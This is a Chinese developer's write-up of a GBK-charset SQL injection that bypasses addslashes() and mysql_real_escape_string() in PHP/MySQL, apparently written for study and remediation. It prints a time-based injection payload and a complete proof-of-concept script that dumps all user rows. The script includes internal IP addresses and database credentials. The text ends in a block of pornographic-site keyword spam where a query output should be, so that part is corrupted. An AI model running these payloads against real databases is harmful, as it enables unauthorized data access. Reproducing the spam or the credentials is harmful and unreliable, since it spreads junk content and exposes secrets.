在上次活動開發過程中，有個程序寫了下面這樣的語句：

$sName = $_GET['name']; 
$sName = addslashes($sName); 
$sql = "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%$sName%';"; 
var_dump($sql);  
exit(); 

結果掃描工具一掃描，發現問題來了，被掃除了SQL注入漏洞，而且還引發了整個數據表被鎖?。▊渥ⅲ阂姷诙糠郑?/p>

檢查安全中心掃描日志發現：
當SQL輸入為：
name=41%bf%27%20or%20sleep%2810.10%29%3d0%20limit%201%23
的時候引發了SQL注入。
//這里輸出：
string(98) "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿///' or sleep(10.10)=0 limit 1#%';"

根本原因是addslash對于字符%BF%27的漏洞。

該漏洞最早2006年被國外用來討論數據庫字符集設為GBK時，0xbf27本身不是一個有效的GBK字符，但經過  addslashes()  轉換后變為0xbf5c27，前面的0xbf5c是個有效的GBK字符，所以0xbf5c27會被當作一個字符0xbf5c和一個單引號來處理，結果漏洞就觸發了。
          mysql_real_escape_string() 也存在相同的問題，只不過相比  addslashes() 它考慮到了用什么字符集來處理，因此可以用相應的字符集來處理字符。
在MySQL中有兩種改變默認字符集的方法。
方法一：
改變mysql配置文件my.cnf
 [client]
default-character-set=GBK

方法二：
在建立連接時使用
CODE:
SET  CHARACTER  SET  'GBK'
例：mysql_query("SET  CHARACTER  SET  'gbk'",  $c);或者
mysql_query(“SET NAMES ‘GBK’”, $c);

問題是方法二在改變字符集時mysql_real_escape_string() 并不知道而使用默認字符集處理從而造成和  addslashes()  一樣的漏洞（備注：這句話是摘抄的，我也沒看懂）

網絡上查詢到有人說：
當mysql_real_escape_string檢測到的編碼方式跟client設置的編碼方式(big5/bgk)不一致時，mysql_real_escape_string跟addslashes是沒有區別的 
比如 
[client] 
default-character-set=latin1 

mysql_query("SET  CHARACTER  SET  'gbk'",  $mysql_conn); 
這種情況下mysql_real_escape_string  是基于  latin1工作的，是不安全的 

[client] 
default-character-set=gbk 

mysql_query("SET  CHARACTER  SET  'gbk'",  $mysql_conn); 
這種情況下，mysql_real_escape_string  基于  gbk  工作，是正常的 

但是，這里我108、153上驗證的都不成功：
用12機器的php文件在108機器mysql上，查詢到

在153鏈接測試環境CDB結點：
 
執行來自：
http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的測試代碼
<?php
//$c  =  mysql_connect("localhost",  "user",  "pass");
$c = mysql_connect("10.1.164.108", "oss", "oss_da");
mysql_select_db("a_jasonyeTest", $c);

//$c = mysql_connect("10.179.12.249:3332", "oss", "oss_da");
//mysql_select_db("dbGuild20120903jasonye", $c);

mysql_select_db("database",  $c);

//  change  our  character  set
mysql_query("SET  CHARACTER  SET  'gbk'",  $c);

//  create  demo  table
mysql_query("CREATE  TABLE  users  (
        username  VARCHAR(32)  PRIMARY  KEY,
        password  VARCHAR(32)
)  CHARACTER  SET  'GBK'",  $c);
mysql_query("INSERT  INTO  users  VALUES('foo','bar'),  ('baz','test')",  $c);

//  now  the  exploit  code
$_POST['username']  =  chr(0xbf)  .  chr(0x27)  .  '  OR  username  =  username  #'; 
$_POST['password']  =  'anything'; 

//  Proper  escaping,  we  should  be  safe,  right?
$user  =  mysql_real_escape_string($_POST['username'],  $c);
$passwd  =  mysql_real_escape_string($_POST['password'],  $c);

$sql  =  "SELECT  *  FROM    users  WHERE    username  =  '{$user}'  AND  password  =  '{$passwd}'";
$res  =  mysql_query($sql,  $c);
echo  mysql_num_rows($res);  //  will  print  2,  indicating  that  we  were  able  to  fetch  all  records

?>
發現：都存在漏洞

縱觀以上兩種觸發漏洞的關鍵是addslashes()、mysql_real_escape_string()在Mysql配置為GBK時就可以觸發漏洞，
另外：mysql_real_escape_string在執行前，必須正確連接到Mysql才有效。

又有，上面產生漏洞的原因主是有GBK的特殊字符所引起的，因而，我們需要在進行addslashes或者mysql_real_escape之前，對輸入字符串進行特殊處理一下。

$this->sName = $_GET['name'];
$this->sName=iconv('utf-8//IGNORE', 'gbk', $this->sName);
$this->sName=iconv('gbk//IGNORE', 'utf-8', $this->sName);             
Iconv這種方式比較粗暴，對于不能識別的特殊字符之后的語句在153機器上會截斷不能識別的字符后面的內容：
如下：
string(32) "41亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb